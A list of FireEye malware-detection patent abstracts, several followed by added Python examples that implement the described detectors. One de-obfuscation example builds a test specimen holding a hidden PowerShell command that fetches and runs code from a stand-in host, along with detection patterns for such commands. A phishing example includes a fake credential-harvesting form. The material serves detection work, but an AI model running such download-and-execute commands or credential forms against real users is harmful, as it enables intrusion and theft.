Patents Assigned to FireEye, Inc.
  • Patent number: 10713362
    Abstract: A method of detecting malware in a specimen of computer content or network traffic is described. The method features conducting a first analysis on the specimen in accordance with a first plurality of analyses and an order of the first plurality of analyses. A second analysis is conducted on the specimen different than the first analysis type. Thereafter, further analyses on the specimen may be altered by modifying information associated with the first plurality of analyses or the order of the first plurality of analyses in response to feedback information based on results from at least the first analysis. The modified information changes a malware analysis of the specimen from being conducted in accordance with the first plurality of analyses to being conducted in accordance with a second plurality of analyses different in analysis type or in order of analyses than the first plurality of analyses.
    Type: Grant
    Filed: March 5, 2018
    Date of Patent: July 14, 2020
    Assignee: FireEye, Inc.
    Inventors: Michael Vincent, Ali Mesdaq, Emmanuel Thioux, Abhishek Singh, Sai Vashisht
  • Patent number: 10715542
    Abstract: An electronic device comprising one or more processors; a storage medium communicatively coupled to the one or more processors, the storage medium having stored thereon logic that, upon execution by the one or more processors, performs operations comprising: (1) receiving, via a first electrical signal, application data from a mobile agent installed on a mobile device, (2) querying, via a second electrical signal, a database for a risk level of each of one or more applications of the mobile device listed in the application data, and (3) determining a threat level for the mobile device based on one or more of: (i) the risk level of at least one of the one or more applications, (ii) usage information of the at least one of the one or more applications, or (iii) configuration information of the mobile device is shown.
    Type: Grant
    Filed: June 30, 2016
    Date of Patent: July 14, 2020
    Assignee: FireEye, Inc.
    Inventors: Wen Wei, Yulong Zhang
  • Patent number: 10706149
    Abstract: A malicious content detection (MCD) system and a computerized method for manipulating time use two or more time controllers operating within the MCD system in order to capture the behavior of delayed-activation malware (time bombs). Each time controller may include a monitoring agent located in a software layer of a computer runtime environment configured to intercept software calls (e.g., API calls or system calls) and/or other time checks that seek to obtain a “current time,” and time-dilation action logic located in a different layer (e.g., a hypervisor layer) configured to respond to the software calls by providing a “false” current time that indicates considerably more time has transpired than the real clock. Additionally, a primary controller may be used in some embodiments to configure and manage the time controllers.
    Type: Grant
    Filed: June 29, 2016
    Date of Patent: July 7, 2020
    Assignee: FireEye, Inc.
    Inventor: Michael Vincent
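    The time-controller mechanism of 10706149, reduced to an added in-process simulation in Python (this is not FireEye code). The real system intercepts time checks at the API/syscall layer and answers them from a hypervisor-layer clock; here the constructed time-bomb sample simply receives the controller object, and the dilation factor and the per-sample real-time budget are assumed parameters. The point it shows is that intercepted sleeps are shortened by the same factor as the reported clock, so a sample that waits ten apparent minutes finishes in a fraction of a real second, while the undilated run only ever sees the sample's first wait.

```python
"""Simulated time controller for delayed-activation ("time bomb") samples.
Added example, not FireEye code: dilation factor and budget are assumed."""
import time


class BudgetExceeded(Exception):
    """Real wall-clock time spent on the sample exceeded the analysis budget."""


class TimeController:
    def __init__(self, dilation: float, budget: float,
                 real_now=time.monotonic, real_sleep=time.sleep):
        self.dilation = dilation       # virtual seconds reported per real second
        self.budget = budget           # real seconds we are willing to spend
        self._real_now = real_now
        self._real_sleep = real_sleep
        self._start = real_now()
        self.sleep_log = []            # every sleep the sample requested

    def _elapsed_real(self) -> float:
        return self._real_now() - self._start

    def _check_budget(self) -> None:
        if self._elapsed_real() > self.budget:
            raise BudgetExceeded()

    def now(self) -> float:
        """The 'false' current time: real elapsed time scaled by the dilation."""
        self._check_budget()
        return self._elapsed_real() * self.dilation

    def sleep(self, seconds: float) -> None:
        """Intercepted sleep: wait only seconds/dilation of real time, and
        never past the budget, so the sample's own waits shrink as well."""
        self._check_budget()
        self.sleep_log.append(seconds)
        remaining = self.budget - self._elapsed_real()
        self._real_sleep(max(0.0, min(seconds / self.dilation, remaining)))


def time_bomb(clock, detonate_after: float = 600.0) -> str:
    """Constructed sample: polls the clock every 30 s and only does its
    malicious work after ten apparent minutes, outlasting a short run."""
    armed_at = clock.now()
    while clock.now() - armed_at < detonate_after:
        clock.sleep(30.0)
    return "detonated"


def analyze(sample, dilation: float, budget: float):
    """Run a sample under a time controller; return its outcome, the real
    seconds spent and how many sleeps it asked for."""
    controller = TimeController(dilation, budget)
    t0 = time.monotonic()
    try:
        verdict = sample(controller)
    except BudgetExceeded:
        verdict = "timed out"
    return verdict, round(time.monotonic() - t0, 2), len(controller.sleep_log)


if __name__ == "__main__":
    print("undilated, 0.2 s budget:  ", analyze(time_bomb, dilation=1.0, budget=0.2))
    print("x3000 dilation, 2 s budget:", analyze(time_bomb, dilation=3000.0, budget=2.0))
```

The undilated run shows why the budget alone is not enough: the sample's first `sleep(30)` consumes the whole budget and the analysis ends with no behaviour observed. With dilation the same sample detonates after roughly twenty shortened sleeps.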
  • Patent number: 10701091
    Abstract: A computerized method to identify potentially malicious code in a network is described. Herein, information associated with a threat is analyzed to yield intelligence that includes instructions or indicators related to the threat. Based on the intelligence, a determination is made as to whether an endpoint device, which includes an endpoint agent, is to (i) receive at least one of the instructions or the indicators, (ii) conduct an examination of memory of the endpoint device for data corresponding to any of the instructions or the indicators, and (iii) obtain results of the examination. Verification information, including at least a portion of the results of the examination by the endpoint device and an identifier for the endpoint device, is gathered and correlated to determine whether such information corresponds to a verified threat. Thereafter, a notification, including a portion of the verification information, is sent to identify the verified threat.
    Type: Grant
    Filed: July 23, 2018
    Date of Patent: June 30, 2020
    Assignee: FireEye, Inc.
    Inventors: Sean Cunningham, Robert Dana, Joseph Nardone, Joseph Faber, Kevin Arunski
  • Patent number: 10673867
    Abstract: A system featuring a cloud-based malware detection system for analyzing an object to determine whether the object is associated with a cyber-attack. Herein, a subscription review service comprises a data store storing subscription information. The subscription information includes an identifier for the customer and one or more identifiers each associated with a corresponding customer submitter operable to submit an object to the cloud-based malware detection system for analysis. A first customer submitter receives credentials provided by the subscription review service to establish communications with the cloud-based malware detection system.
    Type: Grant
    Filed: September 29, 2017
    Date of Patent: June 2, 2020
    Assignee: FireEye, Inc.
    Inventors: Mumtaz Siddiqui, Manju Radhakrishnan
  • Patent number: 10671721
    Abstract: A scalable threat detection system features computing nodes including a first computing node and a second computing node operating as a cluster. Each computing node features an analysis coordinator and an object analyzer. The analysis coordinator is configured to conduct an analysis of metadata associated with a suspicious object that is to be analyzed for malware, where the metadata is received from a remotely located network device, and to store a portion of the metadata within a data store. The object analyzer is configured to retrieve the portion of the metadata from the data store, monitor the duration of retention of the metadata in the data store, and determine whether a timeout event has occurred for the object associated with the metadata when retention of the metadata within the data store exceeds a timeout value included as part of that metadata.
    Type: Grant
    Filed: December 27, 2016
    Date of Patent: June 2, 2020
    Assignee: FireEye, Inc.
    Inventors: Alexander Otvagin, Mumtaz Siddiqui
  • Patent number: 10671726
    Abstract: According to one embodiment, a computerized method comprises processing one or more objects by a first thread of execution of a multi-threaded process, monitoring events that occur during the processing of the one or more objects by the first thread, and storing information associated with the monitored events within an event log. The stored information comprises at least an identifier of the first thread to maintain an association between the monitored events and the first thread. Subsequently, the stored information within the event log is accessed for rendering a graphical display of the monitored events detected during processing of the one or more objects by the first thread on a display screen.
    Type: Grant
    Filed: September 22, 2014
    Date of Patent: June 2, 2020
    Assignee: FireEye, Inc.
    Inventors: Sushant Paithane, Michael Vincent, Sai Vashisht
  • Patent number: 10666686
    Abstract: According to one embodiment, a virtualized malware detection system is integrated with a virtual machine host including a plurality of virtual machines and a security virtual machine. Logic within the virtual machines is configured to perform a dynamic analysis of an object and monitor for the occurrence of a triggering event. Upon detection of a triggering event within a virtual machine, the logic within the virtual machine provides the security virtual machine with information associated with the triggering event for further analysis. Based on the further analysis, the object may then be classified as “non-malicious” or “malicious.”
    Type: Grant
    Filed: December 3, 2018
    Date of Patent: May 26, 2020
    Assignee: FireEye, Inc.
    Inventors: Japneet Singh, Harinath Ramchetty, Anil Gupta
  • Patent number: 10657251
    Abstract: A malware detection system configured to detect suspiciousness in obfuscated content. A multi-stage static detection logic is utilized to detect obfuscation, make the obfuscated content accessible, identify suspiciousness in the accessible content and filter non-suspicious non-obfuscated content from further analysis. The multi-stage static detection logic includes a controller, a de-constructor, and a post-processor. The controller is configured to receive content, while the de-constructor is configured to receive content from the controller and deconstruct it using the analysis technique selected by the controller. The post-processor is configured to receive the de-constructed content from the de-constructor, determine whether a specimen within the de-constructed content is suspicious, and remove non-suspicious content from further analysis.
    Type: Grant
    Filed: June 26, 2017
    Date of Patent: May 19, 2020
    Assignee: FireEye, Inc.
    Inventors: Amit Malik, Shivani Deshpande, Abhishek Singh, Wei Zheng
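    The controller / de-constructor / post-processor pipeline of 10657251 as an added Python example (not FireEye code). The obfuscation forms it recognises (base64 runs, hex runs, JavaScript `String.fromCharCode` lists), the indicator list and the four specimens are all constructed for illustration; the patent does not name the techniques its controller selects among. The stages loop until no recogniser fires, which is what makes a two-layer specimen (character codes hiding a PowerShell encoded command) readable, and the post-processor then filters out anything that decoded to benign text.

```python
"""Multi-stage static de-obfuscation triage. Added example, not FireEye code;
obfuscation forms, indicators and specimens are constructed."""
import base64
import binascii
import re

# Controller recognisers. Look-arounds stop a run matching inside a longer token.
CHARCODE = re.compile(rb"String\.fromCharCode\(([\d,\s]+)\)", re.I)
HEX_RUN = re.compile(rb"(?<![0-9A-Za-z+/])(?:[0-9A-Fa-f]{2}){16,}(?![0-9A-Za-z+/=])")
B64_RUN = re.compile(rb"(?<![0-9A-Za-z+/=])[A-Za-z0-9+/]{32,}={0,2}(?![0-9A-Za-z+/=])")

# Post-processor indicators of suspicious intent in the accessible content.
SUSPICIOUS = {
    "ps-encoded-command": re.compile(rb"powershell[^\n]*\s-enc(odedcommand)?\b", re.I),
    "ps-invoke-expression": re.compile(rb"\bIEX\b|Invoke-Expression", re.I),
    "ps-download": re.compile(rb"DownloadString|DownloadFile", re.I),
    "wscript-shell": re.compile(rb"WScript\.Shell", re.I),
    "js-eval": re.compile(rb"\beval\s*\(", re.I),
}


def select_technique(content: bytes):
    """Controller: choose the de-construction technique, None if no form is seen."""
    if CHARCODE.search(content):
        return "charcode"
    if HEX_RUN.search(content):
        return "hex"
    if B64_RUN.search(content):
        return "base64"
    return None


def _decode_b64(m):
    try:
        raw = base64.b64decode(m.group(0), validate=True)
    except binascii.Error:
        return m.group(0)                 # not valid base64: leave the run alone
    odd = raw[1::2]                       # -EncodedCommand payloads are UTF-16LE;
    if odd and odd.count(0) * 2 > len(odd):   # normalise so byte indicators match
        raw = raw.decode("utf-16-le", "replace").encode("utf-8")
    return raw


def _decode_charcodes(m):
    try:
        return bytes(int(v) for v in m.group(1).split(b",") if v.strip())
    except ValueError:                    # non-numeric or > 255: leave as-is
        return m.group(0)


def deconstruct(content: bytes, technique: str) -> bytes:
    """De-constructor: replace every obfuscated run with its decoded form."""
    if technique == "charcode":
        return CHARCODE.sub(_decode_charcodes, content)
    if technique == "hex":
        return HEX_RUN.sub(lambda m: binascii.unhexlify(m.group(0)), content)
    if technique == "base64":
        return B64_RUN.sub(_decode_b64, content)
    return content


def analyze(content: bytes, max_stages: int = 4) -> dict:
    """Run controller/de-constructor stages until nothing more decodes, then
    let the post-processor judge the accessible content."""
    stages = []
    for _ in range(max_stages):
        technique = select_technique(content)
        if technique is None:
            break
        decoded = deconstruct(content, technique)
        if decoded == content:            # recogniser fired but nothing decoded
            break
        stages.append(technique)
        content = decoded
    hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(content))
    return {"stages": stages, "indicators": hits, "suspicious": bool(hits),
            "specimen": content}


def triage(specimens):
    """Post-processor filter: only suspicious specimens go on to further analysis."""
    return [s for s in specimens if analyze(s)["suspicious"]]


# Constructed specimens. Nothing in SAMPLE_JS matches an indicator before decoding.
_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
_INNER = (b'new ActiveXObject("WScript.Shell").Run("powershell -nop -w hidden -enc '
          + base64.b64encode(_PS.encode("utf-16-le")) + b'")')
SAMPLE_JS = (b"var run = this['ev' + 'al']; var s = String.fromCharCode("
             + b",".join(str(b).encode() for b in _INNER) + b"); run(s);")
SAMPLE_HEX = (b'var s = fromHex("' + binascii.hexlify(b'new ActiveXObject("WScript.Shell")')
              + b'");')
SAMPLE_BENIGN = b"Attached: " + base64.b64encode(
    b"Quarterly report attached, see you Monday. Regards, Alice")
SAMPLE_PLAIN = b"Meeting moved to 3pm, room 4B."

if __name__ == "__main__":
    for s in (SAMPLE_JS, SAMPLE_HEX, SAMPLE_BENIGN, SAMPLE_PLAIN):
        r = analyze(s)
        print(r["stages"], r["indicators"])
```

The `decoded == content` guard matters: a recogniser can fire on a long alphanumeric token that is not actually base64, and without it the loop would spin until `max_stages` without progress.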
  • Patent number: 10642753
    Abstract: A computing device features one or more hardware processors and a memory that is coupled to the one or more processors. The memory comprises software that supports virtualization, including a virtual machine operating in the guest mode and a virtualization layer operating in the host mode. The virtual machine is configured to execute a plurality of processes including a guest agent process. The virtualization layer is configured to protect the guest agent process operating within the virtual machine that provides metadata to the virtualization layer by restricting page permissions for memory pages associated with the guest agent process when the guest agent process is inactive.
    Type: Grant
    Filed: June 30, 2016
    Date of Patent: May 5, 2020
    Assignee: FireEye, Inc.
    Inventor: Udo Steinberg
  • Patent number: 10637880
    Abstract: A method for detecting a cyber-attack by performing a first analysis on content within a first portion of a communication to determine whether the content includes a first high quality indicator. The first high quality indicator identifies a correlation of the content with a malicious activity. Subsequent to the first analysis, performing a second analysis on a second portion of the communication to determine one or more supplemental indicators. Thereafter, the communication is classified as part of a cyber-attack when (i) a value associated with the first high quality indicator exceeds a first threshold without consideration of the one or more supplemental indicators, or (ii) upon failing to exceed the first threshold and being greater than a second threshold, using the values representing the one or more supplemental indicators with the first value to classify the communication as being part of the cyber-attack.
    Type: Grant
    Filed: July 23, 2018
    Date of Patent: April 28, 2020
    Assignee: FireEye, Inc.
    Inventors: Ali Islam, Zheng Bu
  • Patent number: 10621338
    Abstract: A method for detecting a ROP attack comprising processing of an object within a virtual machine managed by a virtual machine monitor (VMM), intercepting an attempted execution by the object of an instruction, the instruction stored on a page in memory that is accessed by the virtual machine, responsive to determining the page includes instructions corresponding to one of a predefined set of function calls, (i) inserting a first transition event into the memory at a starting address location of a function call, and (ii) setting a permission of the page to be execute only, and responsive to triggering the first transition event, halting, by the VMM, the processing of the object and analyzing, by logic within the VMM, content of last branch records associated with the virtual machine to determine whether the processing of the object displays characteristics of a ROP attack is shown.
    Type: Grant
    Filed: June 29, 2016
    Date of Patent: April 14, 2020
    Assignee: FireEye, Inc.
    Inventors: Jonas Pfoh, Phung-Te Ha
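    The analysis step of 10621338, as an added Python example (not FireEye code). The trap mechanism in the abstract (transition events on pages holding sensitive functions, execute-only page permissions, halting the VM from the VMM) needs a hypervisor and is not modelled; what is shown is only the examination of last-branch-record contents once the VM has been halted. The two heuristics used, that a legitimate return lands right after a call instruction and that a ROP chain consists of several consecutive returns into short instruction runs, are the ones published for LBR-based ROP detection (for example kBouncer) and are an assumption here, since the abstract does not say which characteristics its logic looks for. The code map and the two LBR snapshots are constructed.

```python
"""LBR-content analysis for ROP characteristics. Added example, not FireEye
code; heuristics, code map and LBR snapshots are assumptions/constructed."""

# Constructed text section: (address, size, mnemonic). A real system would
# derive this by disassembling the guest's mapped code pages.
CODE = [
    (0x401000, 5, "call 0x402000"),
    (0x401005, 3, "mov rbx, rax"),
    (0x401008, 5, "call 0x402000"),
    (0x40100d, 1, "ret"),
    (0x402000, 1, "push rbp"),
    (0x402001, 3, "mov rbp, rsp"),
    (0x402004, 4, "mov rax, [rdi]"),
    (0x402008, 1, "pop rbp"),
    (0x402009, 1, "ret"),
    # Short instruction runs ending in ret, i.e. usable gadgets.
    (0x403010, 1, "pop rdi"), (0x403011, 1, "ret"),
    (0x403020, 1, "pop rsi"), (0x403021, 1, "ret"),
    (0x403030, 1, "pop rdx"), (0x403031, 1, "ret"),
    (0x403040, 2, "syscall"), (0x403042, 1, "ret"),
]

BY_ADDR = {addr: (size, insn) for addr, size, insn in CODE}
ENDS_AT = {addr + size: insn for addr, size, insn in CODE}   # insn ending just before key


def is_call_preceded(target: int) -> bool:
    """A legitimate return target sits immediately after a call instruction."""
    return ENDS_AT.get(target, "").startswith("call")


def gadget_length(addr: int, limit: int = 20) -> int:
    """Instructions executed from addr until the next ret (capped at limit)."""
    count = 0
    while addr in BY_ADDR and count < limit:
        size, insn = BY_ADDR[addr]
        count += 1
        if insn == "ret":
            return count
        addr += size
    return limit


def analyze_lbr(records, max_gadget: int = 5, min_chain: int = 3) -> dict:
    """records: (from, to) pairs, oldest first, as read from the LBR stack.
    A run of min_chain consecutive returns that are neither call-preceded
    nor longer than max_gadget instructions is reported as a ROP chain."""
    violations, run, longest = [], 0, 0
    for src, dst in records:
        if BY_ADDR.get(src, (0, ""))[1] != "ret":
            run = 0                       # a call or jump breaks any chain
            continue
        if not is_call_preceded(dst) and gadget_length(dst) <= max_gadget:
            violations.append((src, dst))
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return {"violations": violations, "longest_chain": longest,
            "rop": longest >= min_chain}


# Constructed LBR snapshots.
BENIGN_LBR = [(0x401000, 0x402000), (0x402009, 0x401005),
              (0x401008, 0x402000), (0x402009, 0x40100d)]
ROP_LBR = [(0x402009, 0x403010),      # overwritten return address lands on a gadget
           (0x403011, 0x403020), (0x403021, 0x403030), (0x403031, 0x403040)]

if __name__ == "__main__":
    print("benign:", analyze_lbr(BENIGN_LBR))
    print("rop:   ", analyze_lbr(ROP_LBR))
```

The call-preceded check alone is known to be bypassable with gadgets that happen to sit after call instructions, which is why the chain-length condition is applied as well; both remain heuristics, and the hardware LBR depth (typically 16 or 32 entries) bounds how much history is available at the trap.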
  • Patent number: 10623434
    Abstract: A system is provided with one or more virtual machines and a replayer. The virtual machine(s) are configured to mimic operations of a first device. The replayer is configured to mimic operations of a second device. Herein, the replayer receives a portion of network data under analysis, dynamically modifies the portion of the network data, and transmits the modified portion of the network data to at least one virtual machine of the one or more virtual machines in accordance with a protocol sequence utilized between the first device and the second device.
    Type: Grant
    Filed: March 5, 2018
    Date of Patent: April 14, 2020
    Assignee: FireEye, Inc.
    Inventors: Ashar Aziz, Ramesh Radhakrishnan, Osman Ismael
  • Patent number: 10616265
    Abstract: Disclosed is a cyber-security system that is configured to aggregate and unify data from multiple components and platforms on a network. The system allows security administrators to design and implement a workflow of device-actions taken by security individuals in response to a security incident. Based on the nature of a particular threat, the cyber-security system may initiate an action plan that is tailored to the security operations center and their operating procedures to protect potentially impacted components and network resources.
    Type: Grant
    Filed: November 9, 2018
    Date of Patent: April 7, 2020
    Assignee: FireEye, Inc.
    Inventors: Bernard Thomas, David Scott, Fred Brott, Paul Smith
  • Patent number: 10616266
    Abstract: A submission process for a malware detection system including one or more sensors and a cluster including one or more computing nodes is described. The process includes the sensor determining whether a prior malware analysis has been conducted on any previously submitted object matching the object under analysis. If not, the process determines whether the object is suspicious, namely a first probability of the object being associated with malware. If suspicious, metadata associated with the suspicious object is sent to an analysis coordinator of a first computing node of the cluster. The metadata is used in determining whether a prior malware analysis has been previously conducted within the cluster on any object that matches the suspicious object. The metadata is also used in fetching, by an object analyzer of the same or a different computing node of the cluster, the suspicious object from the sensor for malware analysis.
    Type: Grant
    Filed: September 30, 2016
    Date of Patent: April 7, 2020
    Assignee: FireEye, Inc.
    Inventor: Alexander Otvagin
  • Patent number: 10601848
    Abstract: A method for detecting a cyber-attack is described. The method features (i) collecting a first plurality of weak indicators, (ii) grouping a second plurality of weak indicators from the first plurality of weak indicators, where the second plurality of weak indicators is fewer in number than the first plurality of weak indicators, and (iii) performing a correlation operation between the second plurality of weak indicators and one or more patterns or sequences of indicators associated with known malware. A weak indicator of the first plurality of weak indicators corresponds to data that, by itself, is not definitive as to whether the data is associated with a cyber-attack being conducted on a source of the weak indicator.
    Type: Grant
    Filed: June 29, 2017
    Date of Patent: March 24, 2020
    Assignee: FireEye, Inc.
    Inventors: Sundararaman Jeyaraman, Ramaswamy Ramaswamy
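    The collect / group / correlate steps of 10601848, as an added Python example (not FireEye code). The telemetry lines, the indicator names, the per-host ten-minute grouping window and the two known-malware sequences are all constructed; the abstract does not say how its grouping is keyed or how the correlation is performed, so grouping by source host within a time window and ordered-subsequence matching are assumptions. The grouping step is what makes the second plurality smaller than the first: indicators that never land in a bucket with another indicator are dropped before correlation.

```python
"""Grouping and correlating weak indicators. Added example, not FireEye code;
telemetry, indicator names, window and known patterns are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry: "<timestamp> <source host> <weak indicator>".
# None of these is conclusive on its own.
RAW_EVENTS = """\
2024-05-01T09:00:01 ws-17 office_spawned_child
2024-05-01T09:00:03 ws-17 powershell_encoded_cmd
2024-05-01T09:00:09 ws-17 outbound_dns_rare_domain
2024-05-01T09:00:12 ws-17 new_scheduled_task
2024-05-01T09:01:40 ws-22 new_scheduled_task
2024-05-01T11:30:00 ws-09 office_spawned_child
2024-05-01T13:45:00 ws-09 new_scheduled_task
2024-05-01T09:00:20 ws-22 powershell_encoded_cmd
"""

# Constructed patterns: ordered indicator sequences seen with known malware.
KNOWN_PATTERNS = {
    "macro-dropper-chain": ["office_spawned_child", "powershell_encoded_cmd",
                            "new_scheduled_task"],
    "lolbin-persistence": ["powershell_encoded_cmd", "new_scheduled_task"],
}


def parse(raw: str):
    """First plurality: every weak indicator, ordered by time."""
    events = []
    for line in raw.strip().splitlines():
        ts, host, indicator = line.split()
        events.append((datetime.fromisoformat(ts), host, indicator))
    return sorted(events)


def group(events, window=timedelta(minutes=10)):
    """Second plurality: indicators bucketed per source host into windows
    measured from the bucket's first event. Lone indicators cannot form a
    sequence and are dropped, so the output is smaller than the input."""
    per_host = defaultdict(list)
    for ts, host, indicator in events:
        per_host[host].append((ts, indicator))
    groups = []
    for host, evs in per_host.items():
        bucket = [evs[0]]
        for ev in evs[1:]:
            if ev[0] - bucket[0][0] <= window:
                bucket.append(ev)
            else:
                groups.append((host, bucket))
                bucket = [ev]
        groups.append((host, bucket))
    return [(host, b) for host, b in groups if len(b) >= 2]


def is_subsequence(pattern, seq) -> bool:
    """True if pattern occurs in seq in order, with gaps allowed."""
    it = iter(seq)
    return all(any(s == p for s in it) for p in pattern)


def correlate(groups, patterns=KNOWN_PATTERNS):
    """Match each group's ordered indicators against the known sequences."""
    alerts = []
    for host, bucket in groups:
        seq = [indicator for _, indicator in bucket]
        for name, pattern in patterns.items():
            if is_subsequence(pattern, seq):
                alerts.append({"host": host, "pattern": name,
                               "start": bucket[0][0].isoformat(),
                               "indicators": seq})
    return alerts


def detect(raw: str = RAW_EVENTS):
    return correlate(group(parse(raw)))


if __name__ == "__main__":
    for alert in detect():
        print(alert)
```

In the constructed data ws-09 shows the same two indicators as ws-22 but hours apart, so it falls into two single-indicator buckets and produces no alert, while ws-22's two indicators 80 seconds apart do match a known sequence. The window size is therefore a tuning knob with a direct false-negative cost.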
  • Patent number: 10601865
    Abstract: A non-transitory computer readable storage medium having stored thereon instructions when executable by a processor perform operations including responsive to receiving an email including a URL, conducting an analysis of the email including: (i) analyzing a header and a body, and (ii) analyzing the URL; analyzing contents of a web page directed to by the URL; generating a score indicating a level of confidence the email is associated with a phishing attack based on at least one of the analysis of the email or the analysis of the contents of the web page; and responsive to the score being below a threshold, virtually processing the web page to determine whether the web page is associated with the phishing attack is shown.
    Type: Grant
    Filed: September 30, 2015
    Date of Patent: March 24, 2020
    Assignee: FireEye, Inc.
    Inventors: Ali Mesdaq, Abhishek Singh, Varun Jain
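    The scoring flow of 10601865 as an added Python example (not FireEye code): analyse the header and body, analyse each URL, analyse the content of the page the URL points to, sum a confidence score, and route mail whose score stays below the threshold to virtual processing of the page, as the abstract states. The individual checks, their weights, the threshold and the two messages are constructed, and fetching is replaced by a constructed URL-to-HTML table so the example runs offline (a real system fetches the page from an isolated analysis network, never from the recipient's environment).

```python
"""Static e-mail / URL / landing-page scoring. Added example, not FireEye
code; checks, weights, threshold, messages and fetched pages are constructed."""
import email
import re
from email.utils import parseaddr
from urllib.parse import urlparse

ANCHOR = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
PASSWORD_FIELD = re.compile(r'<input[^>]*type="password"', re.I)
FORM_ACTION = re.compile(r'<form[^>]*action="([^"]+)"', re.I)
IP_LITERAL = re.compile(r"\d{1,3}(\.\d{1,3}){3}")
LOOKS_LIKE_HOST = re.compile(r"[\w-]+\.[a-z]{2,}", re.I)
URGENCY = ("verify", "suspended", "within 24 hours", "unusual activity")


def _domain(header_value: str) -> str:
    return parseaddr(header_value)[1].rsplit("@", 1)[-1].lower()


def _host(url: str) -> str:
    if "://" not in url:
        url = "//" + url
    return (urlparse(url).hostname or "").lower()


def analyze_email(msg):
    """(i) header and body, (ii) every URL in the body. Returns score, reasons, urls."""
    score, reasons, urls = 0, [], []
    frm, reply_to = msg.get("From", ""), msg.get("Reply-To", "")
    if reply_to and _domain(reply_to) != _domain(frm):
        score += 2
        reasons.append("Reply-To domain differs from From domain")
    body = msg.get_payload()
    text = (msg.get("Subject", "") + " " + body).lower()
    hits = [w for w in URGENCY if w in text]
    if hits:
        score += min(len(hits), 2)
        reasons.append(f"urgency wording: {hits}")
    for href, anchor_text in ANCHOR.findall(body):
        urls.append(href)
        host, shown = _host(href), anchor_text.strip()
        if LOOKS_LIKE_HOST.search(shown) and _host(shown) != host:
            score += 3
            reasons.append(f"link text shows {shown} but points at {host}")
        if IP_LITERAL.fullmatch(host):
            score += 2
            reasons.append(f"link to raw IP address {host}")
    return score, reasons, urls


def analyze_page(page_url: str, html: str):
    """Content of the page the URL directs to: credential capture signs."""
    score, reasons = 0, []
    if PASSWORD_FIELD.search(html):
        score += 1
        reasons.append("page asks for a password")
        for action in FORM_ACTION.findall(html):
            if _host(action) and _host(action) != _host(page_url):
                score += 2
                reasons.append(f"credential form posts to {_host(action)}")
    return score, reasons


def classify(raw_message: str, pages: dict, threshold: int = 6) -> dict:
    msg = email.message_from_string(raw_message)
    score, reasons, urls = analyze_email(msg)
    for url in urls:
        if url in pages:                  # constructed stand-in for fetching the page
            s, r = analyze_page(url, pages[url])
            score, reasons = score + s, reasons + r
    verdict = "phishing" if score >= threshold else "virtual-processing"
    return {"score": score, "verdict": verdict, "reasons": reasons}


# Constructed messages and landing pages (.example / documentation addresses).
PHISH = """\
From: "Contoso Bank Alerts" <alerts@contoso-bank.example>
Reply-To: recover@mail-contoso-secure.example
Subject: Unusual activity: verify your account within 24 hours
Content-Type: text/html

<p>We detected unusual activity. Your access will be suspended.</p>
<p><a href="http://198.51.100.23/login">https://online.contoso-bank.example/login</a></p>
"""
BENIGN = """\
From: "Contoso Newsletter" <news@contoso-bank.example>
Subject: May newsletter
Content-Type: text/html

<p>Read this month's update: <a href="https://www.contoso-bank.example/news/may">our news page</a></p>
"""
PAGES = {
    "http://198.51.100.23/login":
        '<html><title>Contoso Bank</title><form action="http://collect.mail-contoso-secure.example/p">'
        '<input name="u"><input type="password" name="p"></form></html>',
    "https://www.contoso-bank.example/news/may":
        "<html><title>May news</title><p>Hello</p></html>",
}

if __name__ == "__main__":
    print(classify(PHISH, PAGES))
    print(classify(BENIGN, PAGES))
```

Note the routing: per the abstract, a low score does not mean benign; it means the static evidence was insufficient and the page is handed to dynamic (virtual) processing, which is where a newsletter would be cleared.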
  • Patent number: 10601863
    Abstract: Sensor enrollment management is conducted where features and capabilities for one or more broker computing nodes within the cluster are received by an enrollment service operating within a management system. The enrollment service is configured to receive advertised features and capabilities for computing nodes that are part of a cluster and provide address information associated with the enrollment service to the sensor. Based on information supplied by the sensor, the enrollment service authenticates the sensor, and upon authentication, forwards keying material associated with the sensor to a computing node that is selected for supporting communications to the cluster from the sensor. Also, the enrollment service provides a portion of the advertised features and capabilities associated with the computing node to the sensor to enable the sensor to establish a secure communication path with the computing node for malware analysis of suspicious objects within network traffic monitored by the sensor.
    Type: Grant
    Filed: September 30, 2016
    Date of Patent: March 24, 2020
    Assignee: FireEye, Inc.
    Inventor: Mumtaz Siddiqui
  • Patent number: 10592678
    Abstract: The embodiments herein are directed to a technique for providing secure communication between nodes of a network environment or within a node of the network using a verified virtual trusted platform module (TPM) of each node. The verified virtual TPM illustratively emulates a hardware TPM device to provide software key management of cryptographic keys used to provide the secure communication over a computer network of the network environment. Illustratively, the verified virtual TPM is configured to enforce a security policy of a trusted code base (TCB) that includes the virtual TPM. Trustedness denotes a predetermined level of confidence that the security property is demonstrated by the verified virtual TPM. The predetermined level of confidence is based on an assurance (i.e., grounds) that the verified virtual TPM demonstrates the security property.
    Type: Grant
    Filed: September 9, 2016
    Date of Patent: March 17, 2020
    Assignee: FireEye, Inc.
    Inventors: Osman Abdoul Ismael, Hendrik Tews
  • Patent number: 10587647
    Abstract: A testing technique tests and compares malware detection capabilities of network security devices, such as those commercially available from a variety of cyber-security vendors. Testing is conducted on test samples in a “blind” fashion, where the security devices do not know beforehand whether the test samples are “live” malware or benign network traffic. The test samples are received from a remote server and potentially represent malicious attacks against a testing network. Notably, for truly blind testing, embodiments of the testing technique employ a mixture of malware and benign test samples, as well as addressing subterfuge, to prevent the security devices from being able to reliably determine maliciousness of the test samples based on a source of any of the samples.
    Type: Grant
    Filed: November 22, 2016
    Date of Patent: March 10, 2020
    Assignee: FireEye, Inc.
    Inventors: Yasir Khalid, Nadeem Shahbaz